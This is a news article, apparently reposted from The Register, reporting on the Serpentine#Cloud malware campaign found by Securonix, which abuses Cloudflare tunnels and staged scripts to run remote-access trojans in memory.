A sneaky malware campaign slithers through Cloudflare tunnel subdomains to execute in-memory malicious code and give unknown attackers long-term access to pwned machines.
Securonix threat hunters spotted the ongoing campaign dubbed Serpentine#Cloud, and told us it’s “medium- to large-scale,” and “still very active today,” according to the security shop’s senior researcher, Tim Peck.
While the total number of infections remains unknown, “the campaign appears to be rather widespread as there was no clear sector, industry or country involved,” Peck told The Register.
“Identified telemetry indicates a large overall footprint with observed infections in many Western countries like the United States, the United Kingdom or Germany,” he added. “We also identified quite a few samples with origins pointing to Singapore and India.”
Securonix hasn’t attributed this campaign to an individual or crime crew, but note that its use of English-language comments in the code and focus on Western targets suggests English speakers who are “somewhat sophisticated” and “testing scalable delivery methods.”
“The use of a disposable infrastructure and staged delivery payloads implies the actor is prioritizing stealth and operational agility, allowing them to adapt quickly,” Peck said.
The use of a disposable infrastructure and staged delivery payloads implies the actor is prioritizing stealth and operational agility
The attack starts off with an invoice-themed phishing email that contains a Windows shortcut (.lnk) file disguised as a PDF document. Once the victim clicks on the malicious link, it “kicks off a rather elaborate attack chain consisting of a combination of batch, VBScript and Python stages to ultimately deploy shellcode that loads a Donut-packed PE payload,” Pech wrote in a Wednesday report.
To host and deliver these payloads, the criminals use Cloudflare’s TryCloudflare tunneling services, a legit tool commonly used by developers to expose a server to the internet without opening any ports.
This helps the attackers increase their stealthiness in delivering malware in a couple of ways: first, because TryCloudflare is used for legitimate testing and development purposes, most organizations don’t block it or monitor its traffic. Cloudflare’s TLS certificates also allow the malicious traffic to better blend in with normal network activity and bypass domain-blocking tools.
Plus, using Cloudflare’s tunnels means the attackers don’t need to register domains or rent VPS servers, which makes attribution and takedowns by security researchers more difficult.
Cloudflare did not immediately respond to The Register‘s request for comment. We will update this story if we hear back.
Once the victim clicks on the malicious shortcut file, it triggers a multi-stage infection that uses native Windows tools and legitimate WebDAV transport over HTTPS to further evade anti-virus detection and execute payloads from various remote Cloudflare domains. All of these domains are listed at the end of the Secureonix report, so we’d highly suggest checking them out.
Stage two of the attack downloads and executes a Windows Script File, which functions as a VBScript-based loader. The purpose of this file “is to execute a simple command which will download and execute the next stage payload (stage 3), kiki.bat from yet another remote CloudFlare domain,” Peck wrote.
Stage three, a heavily obfuscated batch file, again “designed for stealth and persistence,” deploys a decoy PDF, checks for antivirus software, downloads and executes Python shellcodes, and establishes persistence through the Windows startup folder.
Finally, these Python shellcodes run Donut-packed payloads incldjuing AsyncRAT or Revenge RAT in memory, so they never touch the disk, and ultimately give the attackers “full command and control over the host,” according to the research.
“With stealthy persistence over the infected host the attacker has the ability to steal passwords, browser/session data, exfiltrate sensitive data or attempt to move laterally to other systems,” Peck wrote. ®
Click Here For The Original Source.
